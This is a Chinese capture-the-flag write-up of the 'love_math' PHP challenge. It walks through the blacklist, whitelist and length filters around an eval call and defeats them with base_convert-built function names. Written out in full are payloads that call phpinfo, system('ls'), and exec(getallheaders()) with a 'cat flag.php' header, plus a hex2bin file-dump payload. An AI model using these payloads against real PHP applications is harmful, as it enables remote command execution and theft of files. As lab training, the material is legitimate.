攻防世界-web-love_math(base_convert进制转换绕过白名单和长度限制)
题目来源:CISCN
题目描述:解密
进入界面
<?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]']; foreach ($blacklist as $blackitem) { if (preg_match('/' . $blackitem . '/m', $content)) { die("请不要输入奇奇怪怪的字符"); } } //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh']; preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs); foreach ($used_funcs[0] as $func) { if (!in_array($func, $whitelist)) { die("请不要输入奇奇怪怪的函数"); } } //帮你算出答案 eval('echo '.$content.';'); }
简单的代码审计
- 首先用户输入的参数值长度不能大于等于80。
- 然后用户输入不能包含黑名单里的字符,比如空格、制表符、回车换行、单双引号、反引号、[]。
- 接着用户输入的字符串需要匹配白名单。
- 最后通过eval函数可以执行用户输入。
测试一下白名单规则,经过试验
- abs(1),匹配出abs,在白名单中,能过
- 1abs(),匹配出abs,在白名单中,能过
- absa(),匹配出absa,不在白名单中,不能过
- abs(a),匹配出abs和a,a不在白名单中,不能过
- abs()a,匹配出abs和a,a不在白名单中,不能过
preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
表示匹配$content变量中以字母或下划线开头,后面任意数量的字母、数组、下划线组成的字符串,将所有的可能结果放在$used_funcs数组中。
其中,
- \x7f-\xff 代表一个ASCII码字符,范围是0x7f(10进制 127)到0xff(10进制 255),这在ascii码表里都是不可见字符。
- * 匹配前面的子表达式零次或多次。
最先我想的是用拼接裁剪的方式把payload组合出来,我极限组合用77字符能把phpinfo给组合出来
$pi=hypot.min.fmod;$pi=$pi{2}.$pi{0}.$pi{2}.$pi{6}.$pi{7}.$pi{8}.$pi{3};$pi()
思路:这段payload可以分为三部分,
- 首先定义一个变量名$pi,因为pi在白名单中且长度最短,其值为hypot.min.fmod,因为hypot、min、fmod均在白名单中,而且phpinfo中的所有字符均可以在其中找到;
- 然后从hypot.min.fmod中分别取第2、0、2、6、7、8、3位置字符,拼成phpinfo字符串,并重新赋值给$pi变量;
- 最后执行$pi(),即执行phpinfo()函数。
但是根据这个思路getflag,怎么也会超长度。
然后考虑是不是touch个文件,进行把命令拆分写入文件,再执行文件,但是也难绕过白名单。
最后看了writeup发现在众多函数中有个base_convert()函数,这个才是解题的关键。
先看看函数的用法https://www.runoob.com/php/func-math-base-convert.html
base_convert(number,frombase,tobase); 函数在任意进制之间转换数字。
在看这道题writeup之前,我的认知还停留在16进制会带个abcdef,殊不知还可以到36进制,可以带所有小写字母。
36进制,是数据的一种表示方法。同我们日常生活中的表示法不一样。它由0-9,A-Z组成,字母不区分大小写。与10进制的对应关系是:0-9对应0-9;A-F对应10-35。
进制说明:36进制是 0-Z (0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ)。
有了这个函数就能大大减短payload了。
首先,实现phpinfo()试试
?c=base_convert(55490343972,10,36)()
然后,实现system('ls'),查看当前目录下的文件
?c=base_convert(1751504350,10,36)(base_convert(784,10,36))
发现了flag.php。
接下来,我们就要尝试读取flag.php。
如果直接使用读取文件函数file_get_contents中包含下划线不在我们36进制中,并且base_convert()第一个参数太长会溢出,也就是10进制数没法无限大。
方法一 借助getallheader()来控制请求头,通过请求头的字段读取flag.php。
这里也就类似于$_GET,$_POST之类的,但是因为只能控制小写字符,所以大写的直接被pass掉。
getallheader()返回的是数组,要从数组里面取数据用array['xxx'],但是无奈[]被waf了,因为{}中是可以带数字的,这里用getallheader(){1}可以返回自定义头1里面的内容。
最后的payload如下
/?c=$pi=base_convert,$pi(696468,10,36)(($pi(8768397090111664438,10,30))(){1}) //exec(getallheaders(){1})
并且在请求头上加上1:cat flag.php字段即可。
payload中,
base_convert(696468,10,36); 代表把696468从10进制转换为36进制,结果为exec。
base_convert(8768397090111664438,10,30); 代表把8768397090111664438从10进制转换为30进制,结果为getallheaders。注意这里不能用36进制,因为getallheaders的36进制转换为10进制后数太长会溢出,也就是无法把10进制数变回getallheader。所以我们在这里采用30进制。(当然这是在linux下使用php7.3版本的结果,如果是在windows下php7.0前的所有版本对于getallheader进行30-36的进制转换,再转换回来的时候都存在溢出,也就是无法把10进制数变回getallheader)
最终得到falg。如下
这里解释一下为什么会输出一个base_convert字符串,因为php中echo xx,yy,即输出xx和yy的结果,xx和yy中间用逗号隔开,echo都能输出。所以这里会把我们payload中的第一项输出出来。
方法二 使用system(hex2bin(nl*))读取所有文件内容
payload如下
?c=($pi=base_convert)(1751504350,10,36)($pi(1438255411,14,34)(dechex(1852579882)))
得到flag为flag{dgjregjvdsmvba356sg},但是不知道为什么提示错误。
参考:
https://www.cnblogs.com/sijidou/p/10802475.html
https://blog.csdn.net/weixin_44604541/article/details/108914188